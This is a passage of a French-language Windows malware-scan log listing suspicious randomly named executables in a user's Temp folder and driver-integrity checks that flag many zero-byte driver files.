2017-08-31 20:36 - 2017-08-31 20:36 - 000673792 _____ () C:\Users\BOB\AppData\Local\Temp\oqarrkpmce.exe 2017-04-23 09:29 - 2016-06-25 18:55 - 004235264 _____ (New Technology Studio) C:\Users\BOB\AppData\Local\Temp\ovi-uninstall.exe 2017-08-31 10:28 - 2017-08-31 10:28 - 000782336 _____ () C:\Users\BOB\AppData\Local\Temp\pbeubrlmci.exe 2017-09-07 17:38 - 2017-09-07 17:38 - 000782336 _____ () C:\Users\BOB\AppData\Local\Temp\phfporvrkl.exe 2017-09-01 12:46 - 2017-09-01 12:46 - 000782336 _____ () C:\Users\BOB\AppData\Local\Temp\pribytbeen.exe 2017-08-09 14:57 - 2017-08-09 14:58 - 000053248 _____ (http://www.beyondlogic.org) C:\Users\BOB\AppData\Local\Temp\Process.exe 2017-04-16 19:03 - 2017-04-16 19:03 - 000040448 _____ () C:\Users\BOB\AppData\Local\Temp\proxy_vole4885022547107105192.dll 2017-08-09 15:58 - 2017-08-09 15:58 - 000086016 _____ () C:\Users\BOB\AppData\Local\Temp\pvrxlaxvrk.exe 2017-09-02 15:13 - 2017-09-02 15:13 - 000139264 _____ () C:\Users\BOB\AppData\Local\Temp\qhizembvsa.exe 2017-08-11 08:00 - 2017-08-11 08:00 - 000258560 _____ () C:\Users\BOB\AppData\Local\Temp\qpdhqthcsx.exe 2017-08-30 17:06 - 2017-08-30 17:07 - 000782336 _____ () C:\Users\BOB\AppData\Local\Temp\qrmpykgrvc.exe 2017-09-04 15:42 - 2017-09-04 15:42 - 000673792 _____ () C:\Users\BOB\AppData\Local\Temp\raicocjcce.exe 2017-08-11 08:07 - 2017-08-11 08:08 - 000082536 _____ () C:\Users\BOB\AppData\Local\Temp\rjrplrsumk.exe 2017-09-01 09:00 - 2017-09-01 09:00 - 000782336 _____ () C:\Users\BOB\AppData\Local\Temp\rmdlxzqkmd.exe 2017-08-31 10:39 - 2017-08-31 10:39 - 000673792 _____ () C:\Users\BOB\AppData\Local\Temp\rnuxcaqrsk.exe 2017-08-30 12:40 - 2017-08-30 12:40 - 000782336 _____ () C:\Users\BOB\AppData\Local\Temp\rostqopxoh.exe 2017-08-30 17:07 - 2017-08-30 17:07 - 000673792 _____ () C:\Users\BOB\AppData\Local\Temp\rpubaslayv.exe 2017-08-31 10:39 - 2017-08-31 10:39 - 000782336 _____ () C:\Users\BOB\AppData\Local\Temp\rrirfjhgsm.exe 2017-08-11 08:06 - 2017-08-11 08:06 - 000258560 _____ () C:\Users\BOB\AppData\Local\Temp\rtktabzpnt.exe 2017-09-13 16:12 - 2017-09-13 16:12 - 000329728 _____ () C:\Users\BOB\AppData\Local\Temp\sadhnkfrdfu.exe 2017-07-11 16:23 - 2017-06-28 11:24 - 001154560 _____ () C:\Users\BOB\AppData\Local\Temp\screen.exe 2017-08-08 17:57 - 2017-08-08 17:57 - 000212992 _____ (Sony DADC Austria AG.) C:\Users\BOB\AppData\Local\Temp\SecuExp.exe 2017-08-30 20:16 - 2017-08-30 20:16 - 000646982 _____ () C:\Users\BOB\AppData\Local\Temp\sgvckojqwn.exe 2017-07-09 09:10 - 2017-12-27 20:26 - 058804680 _____ (Skype Technologies S.A.) C:\Users\BOB\AppData\Local\Temp\SkypeSetup.exe 2017-08-31 07:25 - 2017-08-31 07:25 - 000673792 _____ () C:\Users\BOB\AppData\Local\Temp\slrexxessy.exe 2017-08-31 10:28 - 2017-08-31 10:28 - 000673792 _____ () C:\Users\BOB\AppData\Local\Temp\slvjtnsljh.exe 2017-08-09 14:48 - 2017-08-09 14:48 - 000701952 _____ (SQLite Development Team) C:\Users\BOB\AppData\Local\Temp\sqlite3.exe 2017-09-07 17:38 - 2017-09-07 17:38 - 000782336 _____ () C:\Users\BOB\AppData\Local\Temp\srgpnspkja.exe 2017-05-09 17:04 - 2017-05-20 10:48 - 000000000 _____ () C:\Users\BOB\AppData\Local\Temp\svhost.exe 2017-08-31 20:36 - 2017-08-31 20:36 - 000673792 _____ () C:\Users\BOB\AppData\Local\Temp\syfxhllgpl.exe 2017-08-31 20:36 - 2017-08-31 20:36 - 000782336 _____ () C:\Users\BOB\AppData\Local\Temp\tgeenqbpja.exe 2017-08-30 17:07 - 2017-08-30 17:07 - 000139264 _____ () C:\Users\BOB\AppData\Local\Temp\tqumpuezwq.exe 2017-12-18 16:53 - 2017-12-18 16:54 - 063678360 _____ (Acresso Software Inc.) C:\Users\BOB\AppData\Local\Temp\ubiBB35.tmp.exe 2017-08-31 10:39 - 2017-08-31 10:39 - 000673792 _____ () C:\Users\BOB\AppData\Local\Temp\ubzpxfpehl.exe 2017-09-02 08:56 - 2017-09-02 08:56 - 000673792 _____ () C:\Users\BOB\AppData\Local\Temp\udnmdslnrl.exe 2017-08-10 10:26 - 2017-08-10 10:26 - 000131072 _____ () C:\Users\BOB\AppData\Local\Temp\uhgtsxktzj.exe 2017-09-05 15:58 - 2017-09-05 15:58 - 000673792 _____ () C:\Users\BOB\AppData\Local\Temp\uhlgydsqmv.exe 2017-09-02 08:53 - 2017-09-02 08:53 - 000139264 _____ () C:\Users\BOB\AppData\Local\Temp\uhthaizhjs.exe 2017-09-13 12:43 - 2017-09-13 12:43 - 000782336 _____ () C:\Users\BOB\AppData\Local\Temp\ujykytjtfx.exe 2017-08-31 10:39 - 2017-08-31 10:39 - 000782336 _____ () C:\Users\BOB\AppData\Local\Temp\umcjyoeifn.exe 2017-03-02 17:12 - 2017-03-02 17:12 - 001199825 _____ () C:\Users\BOB\AppData\Local\Temp\unins000.exe 2017-02-27 07:22 - 2016-04-26 11:11 - 000552472 _____ (BlueStack Systems, Inc.) C:\Users\BOB\AppData\Local\Temp\Uninstall.exe 2009-03-28 22:08 - 2009-03-28 22:08 - 000195056 _____ (Electronic Arts, Inc.) C:\Users\BOB\AppData\Local\Temp\UninstallEADM.dll 2017-09-04 15:42 - 2017-09-04 15:42 - 000673792 _____ () C:\Users\BOB\AppData\Local\Temp\unnvkhapqf.exe 2017-09-01 09:00 - 2017-09-01 09:00 - 000782336 _____ () C:\Users\BOB\AppData\Local\Temp\uoijwtzqny.exe 2017-08-10 10:26 - 2017-08-10 10:26 - 000131072 _____ () C:\Users\BOB\AppData\Local\Temp\usrgubivmx.exe 2017-05-09 17:04 - 2017-05-10 11:26 - 002403520 _____ (BitTorrent Inc.) C:\Users\BOB\AppData\Local\Temp\uTorrent.exe 2017-09-07 17:38 - 2017-09-07 17:38 - 000782336 _____ () C:\Users\BOB\AppData\Local\Temp\uuyxhbzzwm.exe 2017-03-20 19:14 - 2017-03-20 19:14 - 014456872 _____ (Microsoft Corporation) C:\Users\BOB\AppData\Local\Temp\vc_redist.x86.exe 2017-08-31 14:07 - 2017-08-31 14:07 - 000782336 _____ () C:\Users\BOB\AppData\Local\Temp\vdsvieanfk.exe 2017-09-04 15:22 - 2017-09-04 15:23 - 000437710 _____ () C:\Users\BOB\AppData\Local\Temp\vhjhhrlwmc.exe 2017-09-03 06:49 - 2017-09-03 06:49 - 000782336 _____ () C:\Users\BOB\AppData\Local\Temp\vhrsdclqxh.exe 2017-08-29 16:20 - 2017-08-29 16:20 - 000782336 _____ () C:\Users\BOB\AppData\Local\Temp\vivfwjitga.exe 2017-08-30 12:39 - 2017-08-30 12:39 - 000000000 _____ () C:\Users\BOB\AppData\Local\Temp\vldnxwwivg.exe 2017-08-31 11:34 - 2017-08-31 11:34 - 000139264 _____ () C:\Users\BOB\AppData\Local\Temp\whiourwlrz.exe 2017-08-10 08:43 - 2017-08-10 08:43 - 000131072 _____ () C:\Users\BOB\AppData\Local\Temp\wjkxkzkzpm.exe 2017-09-01 09:00 - 2017-09-01 09:00 - 000782336 _____ () C:\Users\BOB\AppData\Local\Temp\wvkvtkminf.exe 2017-08-10 10:53 - 2017-08-10 10:53 - 000131072 _____ () C:\Users\BOB\AppData\Local\Temp\xahldzsdns.exe 2017-09-09 09:07 - 2017-09-09 09:07 - 000782336 _____ () C:\Users\BOB\AppData\Local\Temp\xkmazmuvkx.exe 2017-08-30 17:08 - 2017-08-30 17:08 - 000782336 _____ () C:\Users\BOB\AppData\Local\Temp\xnvnspczxf.exe 2017-09-04 15:23 - 2017-09-04 15:23 - 000782336 _____ () C:\Users\BOB\AppData\Local\Temp\xqxkiixfpn.exe 2017-09-13 12:44 - 2017-09-13 12:44 - 000782336 _____ () C:\Users\BOB\AppData\Local\Temp\xtqaqprrmw.exe 2017-08-10 10:53 - 2017-08-10 10:53 - 000131072 _____ () C:\Users\BOB\AppData\Local\Temp\xwezbvmiaf.exe 2017-09-01 09:01 - 2017-09-01 09:01 - 000673792 _____ () C:\Users\BOB\AppData\Local\Temp\ybiyqvsdrv.exe 2017-08-30 08:53 - 2017-08-30 08:53 - 000782336 _____ () C:\Users\BOB\AppData\Local\Temp\ytjafsfxjd.exe 2017-09-04 15:42 - 2017-09-04 15:42 - 000673792 _____ () C:\Users\BOB\AppData\Local\Temp\zagkjwvgwc.exe 2017-09-02 08:56 - 2017-09-02 08:56 - 000782336 _____ () C:\Users\BOB\AppData\Local\Temp\zffravworp.exe 2017-08-30 08:53 - 2017-08-30 08:53 - 000782336 _____ () C:\Users\BOB\AppData\Local\Temp\zqyvcoydxq.exe 2017-08-31 16:10 - 2017-08-31 16:10 - 000673792 _____ () C:\Users\BOB\AppData\Local\Temp\zzwdmxsewv.exe 2008-06-02 13:11 - 2008-06-02 13:11 - 000459400 ____R (Macrovision Corporation) C:\Users\BOB\AppData\Local\Temp\_is473.exe ==================== Bamital & volsnap ====================== (Il n'y a pas de correction automatique pour les fichiers qui ne satisfont pas à la vérification.) C:\Windows\system32\winlogon.exe => Le fichier est signé numériquement C:\Windows\system32\wininit.exe => Le fichier est signé numériquement C:\Windows\SysWOW64\wininit.exe => Le fichier est signé numériquement C:\Windows\explorer.exe => Le fichier est signé numériquement C:\Windows\SysWOW64\explorer.exe => Le fichier est signé numériquement C:\Windows\system32\svchost.exe => Le fichier est signé numériquement C:\Windows\SysWOW64\svchost.exe => Le fichier est signé numériquement C:\Windows\system32\services.exe => Le fichier est signé numériquement C:\Windows\system32\User32.dll => Le fichier est signé numériquement C:\Windows\SysWOW64\User32.dll => Le fichier est signé numériquement C:\Windows\system32\userinit.exe => Le fichier est signé numériquement C:\Windows\SysWOW64\userinit.exe => Le fichier est signé numériquement C:\Windows\system32\rpcss.dll => Le fichier est signé numériquement C:\Windows\system32\dnsapi.dll => Le fichier est signé numériquement C:\Windows\SysWOW64\dnsapi.dll => Le fichier est signé numériquement C:\Windows\system32\Drivers\volsnap.sys => Le fichier est signé numériquement C:\Windows\system32\drivers\24ca7e6b7f2b5486.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\filetrace.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\flpydisk.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\fltMgr.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\fsdepends.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\fs_rec.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\fvevol.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\FWPKCLNT.SYS -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\GAGP30KX.SYS -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\hamachi.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\hcw85cir.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\hdaudbus.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\HECIx64.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\hidbatt.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\hidbth.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\hidclass.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\hidir.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\hidparse.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\hidusb.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\HpSAMD.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\http.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\hwpolicy.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\i8042prt.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\iaStorA.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\iaStorF.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\iaStorV.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\igdkmd64.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\iirsp.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\IntcDAud.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\intelide.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\intelppm.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\ipfltdrv.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\IPMIDrv.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\ipnat.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\iqvw64e.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\irda.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\irenum.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\isapnp.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\iusb3hcs.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\iusb3hub.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\iusb3xhc.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\kbdclass.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\kbdhid.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\ks.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\ksecdd.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\ksecpkg.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\ksthunk.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\lirsgt.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\lltdio.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\lsi_fc.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\lsi_sas.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\lsi_sas2.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\lsi_scsi.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\luafv.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\mcd.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\megasas.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\MegaSR.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\modem.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\monitor.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\mouclass.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\mouhid.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\mountmgr.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\mpio.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\mpsdrv.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\mrxdav.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\mrxsmb.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\mrxsmb10.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\mrxsmb20.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\msahci.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\msdsm.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\msfs.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\mshidkmdf.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\msisadrv.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\msiscsi.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\mskssrv.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\mspclock.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\mspqm.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\msrpc.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\mssmbios.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\mstee.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\MTConfig.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\mup.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\ndis.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\ndiscap.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\ndistapi.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\ndisuio.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\ndiswan.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\ndproxy.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\netbios.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\netbt.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\netio.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\NetUtils2016.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\netvsc60.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\nfrd960.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\npfs.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\nsiproxy.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\ntfs.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\null.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\nvraid.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\nvstor.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\NV_AGP.SYS -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\nwifi.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\ohci1394.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\pacer.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\parport.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\partmgr.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\pci.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\pciide.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\pciidex.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\pcmcia.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\pcw.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\PEAuth.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\portcls.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\processr.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\ql2300.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\ql40xx.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\qwavedrv.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\rasacd.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\rasl2tp.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\raspppoe.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\raspptp.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\rassstp.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\rdbss.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\rdpbus.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\RDPCDD.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\rdpdr.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\RDPENCDD.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\RDPREFMP.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\rdpwd.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\rdyboost.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\rmcast.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\RNDISMP.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\rootmdm.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\rspndr.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\Rt64win7.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\RTKVHD64.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\RtsUStor.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\sbp2port.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\scfilter.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\ScpVBus.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\scsiport.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\secdrv.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\serenum.sys -> MD5 = 